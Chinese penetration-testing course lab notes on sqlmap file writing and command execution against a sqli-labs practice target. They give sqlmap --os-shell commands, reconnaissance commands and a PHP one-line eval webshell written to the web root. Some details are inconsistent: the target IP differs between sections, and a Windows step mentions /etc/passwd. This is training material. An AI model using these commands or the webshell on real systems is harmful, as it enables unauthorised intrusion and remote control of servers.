NSATP-A学习笔记之Day3-6sqlmap读写文件-执行命令

Posted 火星上烤鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NSATP-A学习笔记之Day3-6sqlmap读写文件-执行命令相关的知识,希望对你有一定的参考价值。

sqlmap-读写文件-执行命令-基础实验

实验目的

练习sqlmap读写文件-执行命令

实验环境

目标机:window server 2008

目标机IP: 192.168.232.220

实验工具

burp suit: 一款渗透工具常用的软件

sqlmap: 一款全自动注入工具

实验内容

步骤1. 访问目标机web页面

步骤2. 发现注入点

python sqlmap.py -u http://192.168.232.243/sqli-labs-master/Less-3/?id=2  

步骤3. 进入os-shell交互界面

python sqlmap.py -u http://192.168.232.243/sqli-labs-master/Less-3/?id=2  --os-shell

步骤4 选择网站语言

步骤5 输入网站的绝对路径

C:/phpStudy/WWW/

步骤6. 读取网站敏感文件如/etc/passwd

dir
ifconfig
net user


步骤7.在当前目录下写入任意文件,这里我写入shell.php一句话木马

echo "<?php @eval($_REQUEST['123']);?>" >123.php

步骤8.使用蚁剑执行


总结

–os-shell的执行条件有三个

  • 1.网站的权限必须是root

  • 2.需要直到网站的绝对路径

  • 3.GPC为off,php主动转义功能关闭

小技巧:

在使用–os-shell进行交互之前可以使用–is-dba 来判断是否能够进行shell交互,节省时间。

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

以上是关于NSATP-A学习笔记之Day3-6sqlmap读写文件-执行命令的主要内容,如果未能解决你的问题,请参考以下文章

NSATP-A学习笔记之Day1

NSATP-A学习笔记之Day2-6hydra爆破

NSATP-A学习笔记之Day2-1webshell介绍

NSATP-A学习笔记之Day4-5实战2

NSATP-A学习笔记之Day2-5burp爆破

NSATP-A学习笔记之Day3-4常见注入类型